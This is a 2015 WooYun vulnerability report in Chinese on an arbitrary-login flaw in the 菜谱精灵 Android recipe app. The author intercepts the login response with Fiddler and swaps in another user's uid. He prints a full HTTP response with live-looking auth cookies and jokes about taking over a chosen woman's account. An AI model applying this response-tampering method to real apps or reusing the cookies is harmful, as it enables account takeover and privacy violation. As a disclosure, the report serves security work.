当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0150385
漏洞标题:
美食天下旗下的菜谱精灵安卓app任意用户登录
相关厂商:
美食天下
漏洞作者:
路人甲
提交时间:
2015-10-30 14:46
修复时间:
2015-11-04 14:48
公开时间:
2015-11-04 14:48
漏洞类型:
未授权访问/权限绕过
危害等级:
自评Rank:
20
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

菜谱精灵安卓app任意用户登录

详细说明:

昨天提交美食天下的时候,忘记登录了,没有rank了。。。
今天再提交一个
菜谱精灵 v2.3.8

caipu7.png


在专题看以一个妹子不错

caipu2.png


,fiddler抓包看uid

11.png


退出,重新登录,fiddler设置断点,改包

HTTP/1.1 200 OK
Server: MESS
Date: Thu, 29 Oct 2015 07:42:01 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uchome_loginuser=hehe1234; expires=Fri, 28-Oct-2016 07:42:01 GMT; path=/; domain=.meishichina.com
Set-Cookie: uchome_loginuserid=6852308; expires=Fri, 28-Oct-2016 07:42:01 GMT; path=/; domain=.meishichina.com
Set-Cookie: uchome_auth=fcf0fWubXYZJoiOIk2JnEWOpB5wjYJCBM5VUkpBi5KDRLVMWQ8ozlAhr8Gnul5kTbsRKPzXnoFFAd0Cjmjga7w2RZaHr; expires=Sat, 28-Nov-2015 07:42:01 GMT; path=/; domain=.meishichina.com; httponly
Content-Length: 30
{"user_userLogin":"6852308"}


把{"user_userLogin":"6852308"}修改为妹子的uid,
成功登录

caipu5.png


妹子还挺贤惠~~菜谱挺多

caipu6.png


漏洞证明:

昨天提交美食天下的时候,忘记登录了,没有rank了。。。
今天再提交一个
菜谱精灵 v2.3.8

caipu7.png


在专题看以一个妹子不错

caipu2.png


,fiddler抓包看uid

11.png


退出,重新登录,fiddler设置断点,改包

HTTP/1.1 200 OK
Server: MESS
Date: Thu, 29 Oct 2015 07:42:01 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uchome_loginuser=hehe1234; expires=Fri, 28-Oct-2016 07:42:01 GMT; path=/; domain=.meishichina.com
Set-Cookie: uchome_loginuserid=6852308; expires=Fri, 28-Oct-2016 07:42:01 GMT; path=/; domain=.meishichina.com
Set-Cookie: uchome_auth=fcf0fWubXYZJoiOIk2JnEWOpB5wjYJCBM5VUkpBi5KDRLVMWQ8ozlAhr8Gnul5kTbsRKPzXnoFFAd0Cjmjga7w2RZaHr; expires=Sat, 28-Nov-2015 07:42:01 GMT; path=/; domain=.meishichina.com; httponly
Content-Length: 30
{"user_userLogin":"6852308"}


把{"user_userLogin":"6852308"}修改为妹子的uid,
成功登录

caipu5.png


妹子还挺贤惠~~菜谱挺多

caipu6.png


修复方案:

你们懂得~~

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-04 14:48

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无